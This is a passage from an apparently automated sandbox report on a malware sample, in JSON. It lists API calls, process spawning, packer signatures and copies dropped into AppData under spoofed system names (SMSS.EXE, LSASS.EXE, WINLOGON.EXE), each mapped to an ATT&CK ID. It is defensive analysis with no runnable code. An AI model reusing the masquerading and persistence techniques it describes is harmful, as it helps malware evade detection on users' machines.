00000000-00003856)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003588)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003660)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003660)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003252)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003252)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003260)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003260)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003260)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003260)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003260)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003260)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003516)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003516)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001420)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003296)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003296)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000700)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000700)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000700)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000700)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000700)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001332)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004488)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004488)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004488)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004488)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004488)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004488)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004488)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002916)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002916)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002916)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002916)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002916)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001616)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001616)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003968)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001784)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003344)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005832)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004312)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006128)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004140)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004304)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005992)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005932)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003572)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002744)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003560)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003780)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002632)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002660)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004456)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003556)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004224)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004404)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00001200)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002236)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002044)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001880)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004380)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002644)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004396)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002852)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005832)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004312)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006128)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004140)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004304)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005992)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005932)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003572)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002744)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003560)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003780)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002632)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002660)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004456)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003556)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004224)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004404)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00001200)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002236)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002044)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001880)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004380)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002644)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004396)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002852)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" was detected as \"UPX\" and name: \"Packer\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4k51k4.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4k51k4.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4k51k4.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS .exe\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS .exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS .exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"UPX\" and name: \"Packer\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9CA14.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9CA14.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9CA14.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C477.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C477.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C477.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrHelloween.scr\" was detected as \"UPX\" and name: \"Packer\"\n \"MrHelloween.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrHelloween.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C852.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C852.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C852.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C855.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C855.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C855.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C479.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C479.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C479.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"services.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"shell.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4k51k4.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS .exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"New Folder.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Data HAPUBWS.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Empty.pif\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"WINLOGON.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9CA14.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C477.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SMSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"LSASS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"MrHelloween.scr\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C852.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C855.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C479.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00002632]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00002632]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00002632]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00002632]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00002632]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file 